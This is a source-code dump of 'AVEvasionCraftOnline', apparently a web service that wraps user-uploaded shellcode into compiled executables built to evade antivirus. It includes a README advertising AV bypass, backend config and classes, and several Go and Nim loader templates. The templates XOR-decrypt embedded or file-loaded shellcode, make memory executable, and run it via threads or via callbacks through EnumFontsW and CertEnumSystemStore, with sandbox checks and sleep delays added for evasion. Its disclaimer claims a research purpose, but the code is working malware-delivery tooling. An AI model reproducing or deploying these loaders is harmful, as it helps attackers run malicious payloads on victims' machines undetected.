h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/router/index.js: 
-------------------------------------------------------------------------------- 1 | import { createRouter, createWebHistory } from 'vue-router' 2 | 3 | const routes = [ 4 | { 5 | path: '/', 6 | name: 'bypass', 7 | component: () => 8 | import(/* webpackChunkName: "about" */ '../views/BypassAV.vue') 9 | }, 10 | { 11 | path: '/about', 12 | name: 'about', 13 | // route level code-splitting 14 | // this generates a separate chunk (about.[hash].js) for this route 15 | // which is lazy-loaded when the route is visited. 16 | component: () => 17 | import(/* webpackChunkName: "about" */ '../views/AboutView.vue') 18 | } 19 | ] 20 | 21 | const router = createRouter({ 22 | history: createWebHistory(import.meta.env.BASE_URL), 23 | routes 24 | }) 25 | 26 | export default router 27 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/style-dark.css: -------------------------------------------------------------------------------- 1 | @charset "utf-8"; 2 | /* Please ❤ this if you like it! 
*/ 3 | /*@import url('https://fonts.googleapis.com/css2?family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap');*/ 4 | 5 | html.dark { 6 | /* el-plus自定义 */ 7 | --el-card-bg-color: #242525; 8 | --el-bg-color-overlay: #242525; 9 | --el-text-color-primary: #ddd; 10 | 11 | /* 自定义 */ 12 | --color: #dddddd; 13 | --background-color: #2b2d2d; 14 | 15 | --bg-header: #242525; 16 | --header-text-color: #c7c0b5; 17 | --bg-footer: #242525; 18 | --el-footer-height: 60px; 19 | --footer-text-color: #ddd; 20 | 21 | --text-color: rgb(219, 213, 204); 22 | --second-text-color: #9f9688; 23 | --link-color: #f96518; 24 | } 25 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/resources/application.yaml: -------------------------------------------------------------------------------- 1 | bypassav: 2 | templates-directory: /home/kali/AVEvasionCraftOnline/template 3 | storage-directory: /home/kali/AVEvasionCraftOnline/download 4 | compilerwork-directory: /home/kali/AVEvasionCraftOnline/compiler 5 | templates-mapping: 6 | go_VirtualAlloc: 7 | loadMethod: 8 | - EMBEDDED 9 | - REMOTE 10 | - LOCAL 11 | transformation: 12 | - base64Xor 13 | - xor 14 | nim_VirtualAlloc: 15 | loadMethod: 16 | - EMBEDDED 17 | - LOCAL 18 | transformation: 19 | - xor 20 | c_VirtualAlloc: 21 | loadMethod: 22 | - EMBEDDED 23 | transformation: 24 | - none 25 | compiler-c: x86_64-w64-mingw32-gcc 26 | compiler-nim: nim 27 | compiler-golang: go 28 | 29 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/dto/ShellcodeUploadDTO.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.dto; 2 | 3 | import lombok.AllArgsConstructor; 4 | import lombok.Getter; 5 | import 
lombok.NoArgsConstructor; 6 | import lombok.Setter; 7 | import org.springframework.web.multipart.MultipartFile; 8 | 9 | @Getter 10 | @Setter 11 | @NoArgsConstructor 12 | @AllArgsConstructor 13 | public class ShellcodeUploadDTO { 14 | private MultipartFile shellcode; 15 | 16 | private String templateLanguage; 17 | private String templateName; 18 | private String transformation; 19 | private StorageType storageType; 20 | private String additionalParameter; // 文件名或者url 21 | 22 | public enum StorageType { 23 | EMBEDDED, 24 | LOCAL, 25 | REMOTE 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.0.5 h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs= 2 | github.com/andybalholm/brotli v1.0.5/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 3 | github.com/klauspost/compress v1.17.0 h1:Rnbp4K9EjcDuVuHtd0dgA4qNuv9yKDYKK1ulpJwgrqM= 4 | github.com/klauspost/compress v1.17.0/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.51.0 h1:8b30A5JlZ6C7AS81RsWjYMQmrZG6feChmgAolCl1SqA= 8 | github.com/valyala/fasthttp v1.51.0/go.mod h1:oI2XroL+lI7vdXyYoQk03bXBThfFl2cVdIA3Xl7cH8g= 9 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 10 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 11 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.0.5 h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs= 2 | 
github.com/andybalholm/brotli v1.0.5/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 3 | github.com/klauspost/compress v1.17.0 h1:Rnbp4K9EjcDuVuHtd0dgA4qNuv9yKDYKK1ulpJwgrqM= 4 | github.com/klauspost/compress v1.17.0/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.51.0 h1:8b30A5JlZ6C7AS81RsWjYMQmrZG6feChmgAolCl1SqA= 8 | github.com/valyala/fasthttp v1.51.0/go.mod h1:oI2XroL+lI7vdXyYoQk03bXBThfFl2cVdIA3Xl7cH8g= 9 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 10 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 11 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/FileUtilsTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.io.IOException; 6 | 7 | import static org.junit.jupiter.api.Assertions.*; 8 | 9 | class FileUtilsTest { 10 | 11 | @Test 12 | void saveFileZIP() throws IOException { 13 | 14 | String filePath = "C:\\1bypassAVOnline\\calc.exe"; 15 | String outputZipFilePath = "C:\\1bypassAVOnline\\download\\Test\\"; 16 | // System.out.println(FileUtils.saveFileZIP(filePath, 17 | // "C:\\1bypassAVOnline\\calc.bin", outputZipFilePath)); 18 | } 19 | 20 | @Test 21 | void readFileBytes() { 22 | System.out.println(FileUtils.readFileBytes("C:\\1bypassAVOnline\\calc.bin")); 23 | 24 | } 25 | 26 | @Test 27 | void copyFile() { 28 | } 29 | 30 | @Test 31 | void saveFileBytes() { 32 | } 33 | } 34 | -------------------------------------------------------------------------------- 
/AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/config/BypassAVConfigProperties.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.config; 2 | 3 | import com.fasterxml.jackson.annotation.JsonIgnore; 4 | import lombok.Getter; 5 | import lombok.Setter; 6 | import org.springframework.boot.context.properties.ConfigurationProperties; 7 | import org.springframework.stereotype.Component; 8 | 9 | import java.util.List; 10 | import java.util.Map; 11 | 12 | @Getter 13 | @Setter 14 | @Component 15 | @ConfigurationProperties(prefix = "bypassav") 16 | public class BypassAVConfigProperties { 17 | 18 | @JsonIgnore 19 | private String templatesDirectory; 20 | @JsonIgnore 21 | private String storageDirectory; 22 | @JsonIgnore 23 | private String compilerWorkDirectory; 24 | 25 | private Map>> templatesMapping; 26 | @JsonIgnore 27 | private String compilerC; 28 | @JsonIgnore 29 | private String compilerNim; 30 | @JsonIgnore 31 | private String compilerGolang; 32 | 33 | 34 | } 35 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "vite-vue-template", 3 | "private": true, 4 | "version": "0.0.0", 5 | "type": "module", 6 | "scripts": { 7 | "dev": "vite", 8 | "build": "vite build", 9 | "preview": "vite preview", 10 | "lint": "eslint --ext .js,.vue --ignore-path .gitignore --fix src", 11 | "format": "prettier --write ." 
12 | }, 13 | "dependencies": { 14 | "@element-plus/icons-vue": "^2.3.1", 15 | "@vueuse/core": "^9.2.0", 16 | "axios": "^0.27.2", 17 | "element-plus": "^2.4.4", 18 | "js-cookie": "^3.0.1", 19 | "normalize.css": "^8.0.1", 20 | "vue": "^3.2.37", 21 | "vue-router": "^4.0.3", 22 | "vuex": "^4.0.2" 23 | }, 24 | "devDependencies": { 25 | "@vitejs/plugin-vue": "^3.1.0", 26 | "eslint": "^8.23.1", 27 | "eslint-config-prettier": "^8.5.0", 28 | "eslint-plugin-vue": "^9.5.1", 29 | "less": "^4.1.3", 30 | "less-loader": "^11.0.0", 31 | "prettier": "^2.7.1", 32 | "sass": "^1.32.7", 33 | "sass-loader": "^12.0.0", 34 | "vite": "^3.1.0" 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 yutianqaq 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/vite.config.js: -------------------------------------------------------------------------------- 1 | import { defineConfig, loadEnv } from 'vite' 2 | import vue from '@vitejs/plugin-vue' 3 | import { resolve } from 'path' 4 | 5 | const config_dev = loadEnv('development', './') 6 | const config_pro = loadEnv('production', './') 7 | // https://vitejs.dev/config/ 8 | export default defineConfig({ 9 | plugins: [vue()], 10 | server: { 11 | open: false, 12 | proxy: { 13 | // 匹配到的时开发环境 14 | '/dev-api': { 15 | target: config_dev.VITE_API_URL, //后台服务地址 16 | changeOrigin: true, 17 | //重写,/api开头的替换成空字符串,即去掉接口中去掉这个字符串 18 | rewrite: path => path.replace(/^\/dev-api/, '') 19 | }, 20 | // 拦截请求地址包含/api,匹配到的是生产环境 21 | '/api': { 22 | target: config_pro.VITE_API_URL, //后台服务地址 23 | changeOrigin: true, 24 | // 重写,/api开头的替换成空字符串,即去掉接口中去掉这个字符串 25 | rewrite: path => path.replace(/^\/api/, '') 26 | } 27 | } 28 | }, 29 | resolve: { 30 | // 别名src下的资源路径都可以以@/替换 31 | alias: [ 32 | { 33 | find: '@', 34 | replacement: resolve(__dirname, 'src') 35 | } 36 | ], 37 | // 忽略.vue后缀 38 | extensions: ['.js', '.ts', '.jsx', '.tsx', '.json', '.vue'] 39 | } 40 | }) 41 | -------------------------------------------------------------------------------- /template/nim/nim_VirtualAlloc/xor/LOCAL/nim_VirtualAlloc.nim: -------------------------------------------------------------------------------- 1 | {.emit: """ 2 | 3 | #include "windows.h" 4 | #include 5 | 6 | #pragma warning(disable:4996) 7 | 8 | void XOR(char* data, size_t data_len, char* key, size_t key_len) { 9 | int j = 0; 10 | 11 | for (size_t i = 0; i < data_len; i++) { 12 | if (j == key_len) j = 0; 13 | 14 | data[i] = data[i] ^ key[j]; 15 | j++; 16 | } 17 | } 18 | 19 | int x2Ldrx() { 20 | 21 | FILE* fp; 22 | BOOL rv; 23 | HANDLE th; 24 | SIZE_T size; 25 | void* exec_mem; 26 | DWORD oldprotect = 0; 27 | 28 | char key[] = { {{Key}} }; 29 | 
30 | fp = fopen("{{LOCAL_FILENAME}}", "rb"); 31 | fseek(fp, 0, SEEK_END); 32 | size = ftell(fp); 33 | fseek(fp, 0, SEEK_SET); 34 | exec_mem = VirtualAlloc(0, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 35 | 36 | fread(exec_mem, size, 1, fp); 37 | XOR((char*)exec_mem, size, key, sizeof(key)); 38 | 39 | rv = VirtualProtect(exec_mem, size, PAGE_EXECUTE_READ, &oldprotect); 40 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0); 41 | WaitForSingleObject(th, -1); 42 | 43 | return 0; 44 | } 45 | """.} 46 | proc x2Ldr(): int 47 | {.importc: "x2Ldrx", nodecl.} 48 | 49 | when isMainModule: 50 | var result = x2Ldr() -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/enums/Result.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.enums; 2 | 3 | import lombok.AllArgsConstructor; 4 | import lombok.Data; 5 | import lombok.NoArgsConstructor; 6 | 7 | import java.io.Serializable; 8 | 9 | /** 10 | * 接口统一返回包装类 11 | */ 12 | @Data 13 | @NoArgsConstructor 14 | @AllArgsConstructor 15 | public class Result implements Serializable { 16 | public static final long serialVersionUID = 42L; 17 | public static final String CODE_SUCCESS = "200"; 18 | public static final String CODE_SYS_ERROR = "500"; 19 | 20 | public String code; 21 | public String msg; 22 | public Object data; 23 | 24 | public static Result success() { 25 | return new Result(CODE_SUCCESS, "操作成功", null); 26 | } 27 | 28 | public static Result success(Object data) { 29 | return new Result(CODE_SUCCESS, "操作成功", data); 30 | } 31 | 32 | public static Result error(String code, String msg) { 33 | return new Result(code, msg, null); 34 | } 35 | 36 | public static Result error(String msg) { 37 | return new Result(CODE_SYS_ERROR, msg, null); 38 | } 39 | 40 | public static Result error() { 41 | return new Result(CODE_SYS_ERROR, 
"系统错误", null); 42 | } 43 | 44 | } 45 | -------------------------------------------------------------------------------- /template/nim/nim_VirtualAlloc/xor/EMBEDDED/nim_VirtualAlloc.nim: -------------------------------------------------------------------------------- 1 | import winim/lean 2 | import os 3 | 4 | proc xorEncrypt[I, J, byte](code: array[I, byte], key: array[J, byte]): array[I, byte] = 5 | var result: array[I, byte] 6 | for i in 0 ..< code.len: 7 | result[i] = code[i] xor key[i mod key.len] 8 | return result 9 | 10 | proc Ldr1[I, T](shellcode: array[I, T]): void = 11 | 12 | var pHandle: HANDLE = GetCurrentProcess() 13 | 14 | let rPtr = VirtualAllocEx( 15 | pHandle, 16 | NULL, 17 | cast[SIZE_T](shellcode.len), 18 | MEM_COMMIT, 19 | PAGE_READWRITE 20 | ) 21 | var key: array[10, byte] = [byte {{Key}} ] 22 | 23 | var shellcode: array[{{Len}}, byte] = xorEncrypt(shellcode, key) 24 | 25 | var bytesWritten: SIZE_T 26 | let wSuccess = WriteProcessMemory( 27 | pHandle, 28 | rPtr, 29 | unsafeAddr shellcode, 30 | cast[SIZE_T](shellcode.len), 31 | addr bytesWritten 32 | ) 33 | 34 | var oldProtectCalc: DWORD 35 | let rv = VirtualProtect(rPtr, shellcode.len, PAGE_EXECUTE_READ, cast[PDWORD](addr(oldProtectCalc))) 36 | 37 | if rv != 0: 38 | var tHandle = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](rPtr), nil, 0, nil) 39 | WaitForSingleObject(tHandle, -1) 40 | 41 | when defined(windows): 42 | 43 | var shellcode: array[{{Len}}, byte] = [ 44 | byte {{Shellcode}} ] 45 | 46 | when isMainModule: 47 | let path = getAppFilename() 48 | if path[10] == '\\': 49 | quit(1) 50 | else: 51 | Ldr1(shellcode) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | > 免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。 2 | 3 | # AV Evasion Craft Online 4 | 5 | **不要搭建在公网中** 有问题请先看 
[issues](https://github.com/yutianqaq/AVEvasionCraftOnline/issues) 6 | 7 | 代码维护/新增请参考 [先知社区-Golang 免杀与AV Evasion Craft Online 在线免杀生成平台](https://xz.aliyun.com/t/13411?time__1311=mqmxnDBQqDq7wq05d4%2BxCuwCxu7faQQY4D#toc-6:~:text=%E5%A2%9E%E5%8A%A0%E4%B8%80%E5%AE%9A%E9%9A%BE%E5%BA%A6-,Go%20%E5%85%8D%E6%9D%80,-%E5%B9%B3%E5%8F%B0%E8%87%AA%E5%B8%A6) 8 | 9 | ![image-20240124190806863](images/image-20240124190806863.png) 10 | 11 | 可绕过常见杀软 12 | 13 | ## 特点 14 | ​ 1、轻松使用 15 | - 通过简单的上传操作,用户可以生成免杀 Payload,无需手动配置和编码。 16 | 17 | 2、时间节省 18 | - 减少协作时的环境配置和手动操作,提高效率。 19 | 20 | 3、模板化 21 | - 用户可以通过配置文件快速应用不同的载入方式,增加生成的 Payload 的多样性。 22 | 23 | 24 | 生成的压缩包密码为 yutian 25 | 26 | 27 | 支持编译 nim、go、c 语言 28 | 29 | 支持 3 种 shellcode 存储方式(内嵌、本地、远程) 30 | 31 | 2024年3月10日 更新 8 种加载方式 (Golang) 32 | 33 | ![PixPin_2024-03-10_16-41-50](images/012.png) 34 | 35 | ![PixPin_2024-03-10_17-45-02](images/013.png) 36 | 37 | 38 | 39 | # 安装 40 | 41 | [详细版本](https://github.com/yutianqaq/AVEvasionCraftOnline/wiki) 42 | 43 | 模板不定期更新,启动后端时请指定参数 44 | 45 | 下载后,修改 application.yaml 中的路径(**非常重要**) 46 | 47 | ![image-20240131132406380](images/image-20240131132406380.png) 48 | 49 | 接着指定参数,jar 包名称需要更改。之后访问对应的端口即可 50 | 51 | `java -jar -Dspring.config.location=application.yaml AVEvasionCraftOnline.jar --server.port=80` 52 | 53 | 54 | 55 | # 参考 56 | 57 | https://github.com/wsheeny/vite-vue-template 58 | 59 | https://github.com/r00tSe7en/get_AV 60 | 61 | https://github.com/qi4L/CallbackLoader 62 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/EMBEDDED/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "golang.org/x/sys/windows" 5 | "time" 6 | "unsafe" 7 | "math/rand" 8 | "os" 9 | 10 | "syscall" 11 | ) 12 | 13 | func XorDecrypt(plaintext []byte, key []byte) []byte { 14 | ciphertext := make([]byte, len(plaintext)) 15 | keyLength := len(key) 16 | for i, byte := range plaintext { 17 
| keyByte := key[i % keyLength] 18 | encryptedByte := byte ^ keyByte 19 | ciphertext[i] = encryptedByte 20 | } 21 | return ciphertext 22 | } 23 | 24 | func DecryptData(v2 []byte) []byte { 25 | key := []byte{{{Key}}} 26 | v222 := XorDecrypt(v2, key) 27 | return v222 28 | } 29 | 30 | func WriteMemory(inbuf []byte, destination uintptr) { 31 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 32 | writePtr := unsafe.Pointer(destination + uintptr(index)) 33 | v := (*byte)(writePtr) 34 | *v = inbuf[index] 35 | } 36 | } 37 | 38 | func Ldr1(calc []byte) { 39 | 40 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 41 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 42 | calc_len := uintptr(len(calc)) 43 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 44 | WriteMemory(calc, Ptr1) 45 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 46 | } 47 | 48 | 49 | func Sleeeep() { 50 | res := 1 51 | for i := 0; i < 5; i++ { 52 | number := rand.Intn(900) + 100 53 | res *= number 54 | } 55 | time.Sleep(10 * time.Second) 56 | } 57 | 58 | func main() { 59 | 60 | args := os.Args[0] 61 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 62 | os.Exit(0) 63 | } 64 | 65 | Sleeeep() 66 | 67 | ciphertext := []byte{{{Shellcode}}} 68 | 69 | byteData := DecryptData(ciphertext) 70 | 71 | Ldr1(byteData) 72 | } -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/EMBEDDED/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | User32 = 
syscall.NewLazyDLL("User32.dll") 25 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetDC = User32.NewProc("GetDC") 28 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dc, _, _ := GetDC.Call(NULL) 36 | EnumFontsW.Call(dc, NULL, addr, NULL) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(shellcode []byte) []byte { 51 | key := []byte{{{Key}}} 52 | decryptShellcode := XorDecrypt(shellcode, key) 53 | return decryptShellcode 54 | } 55 | 56 | func main() { 57 | args := os.Args[0] 58 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 59 | os.Exit(0) 60 | } 61 | 62 | ciphertext := []byte{{{Shellcode}}} 63 | byteData := DecryptData(ciphertext) 64 | Callback(byteData) 65 | } 66 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/EMBEDDED/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "encoding/base64" 5 | "golang.org/x/sys/windows" 6 | "time" 7 | "unsafe" 8 | "math/rand" 9 | "os" 10 | 11 | "syscall" 12 | ) 13 | 14 | func XorDecrypt(plaintext []byte, key []byte) []byte { 15 | ciphertext := make([]byte, len(plaintext)) 16 | keyLength := len(key) 17 | for i, byte := range plaintext { 18 | keyByte := key[i % keyLength] 19 | encryptedByte := byte ^ keyByte 
20 | ciphertext[i] = encryptedByte 21 | } 22 | return ciphertext 23 | } 24 | 25 | func DecryptData(v2 string) []byte { 26 | key := []byte{{{Key}}} 27 | v22, _ := base64.StdEncoding.DecodeString(v2) 28 | v222 := XorDecrypt(v22, key) 29 | return v222 30 | } 31 | 32 | func WriteMemory(inbuf []byte, destination uintptr) { 33 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 34 | writePtr := unsafe.Pointer(destination + uintptr(index)) 35 | v := (*byte)(writePtr) 36 | *v = inbuf[index] 37 | } 38 | } 39 | 40 | func Ldr1(calc []byte) { 41 | 42 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 43 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 44 | calc_len := uintptr(len(calc)) 45 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 46 | WriteMemory(calc, Ptr1) 47 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 48 | } 49 | 50 | 51 | func Sleeeep() { 52 | res := 1 53 | for i := 0; i < 5; i++ { 54 | number := rand.Intn(900) + 100 55 | res *= number 56 | } 57 | time.Sleep(10 * time.Second) 58 | } 59 | 60 | func main() { 61 | 62 | args := os.Args[0] 63 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 64 | os.Exit(0) 65 | } 66 | 67 | Sleeeep() 68 | 69 | ciphertext := "{{Shellcode}}" 70 | 71 | byteData := DecryptData(ciphertext) 72 | 73 | Ldr1(byteData) 74 | } -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/EMBEDDED/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "golang.org/x/sys/windows" 9 | ) 10 | 11 | const ( 12 | MEM_COMMIT = 0x1000 13 | MEM_RESERVE = 0x2000 14 | PAGE_EXECUTE_READWRITE = 0x40 15 | ) 16 | 17 | var ( 18 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 19 | ntdll = syscall.NewLazyDLL("ntdll.dll") 20 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 21 | 
VirtualAlloc = kernel32.NewProc("VirtualAlloc") 22 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 23 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 24 | ) 25 | 26 | func Callback(shellcode []byte) { 27 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 28 | if err != nil && err.Error() != "The operation completed successfully." { 29 | syscall.Exit(0) 30 | } 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 33 | 34 | } 35 | 36 | func XorDecrypt(plaintext []byte, key []byte) []byte { 37 | ciphertext := make([]byte, len(plaintext)) 38 | keyLength := len(key) 39 | for i, byte := range plaintext { 40 | keyByte := key[i%keyLength] 41 | encryptedByte := byte ^ keyByte 42 | ciphertext[i] = encryptedByte 43 | } 44 | return ciphertext 45 | } 46 | 47 | func DecryptData(shellcode []byte) []byte { 48 | key := []byte{{{Key}}} 49 | decryptShellcode := XorDecrypt(shellcode, key) 50 | return decryptShellcode 51 | } 52 | 53 | func main() { 54 | args := os.Args[0] 55 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 56 | os.Exit(0) 57 | } 58 | 59 | ciphertext := []byte{{{Shellcode}}} 60 | byteData := DecryptData(ciphertext) 61 | Callback(byteData) 62 | } 63 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/EMBEDDED/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | 
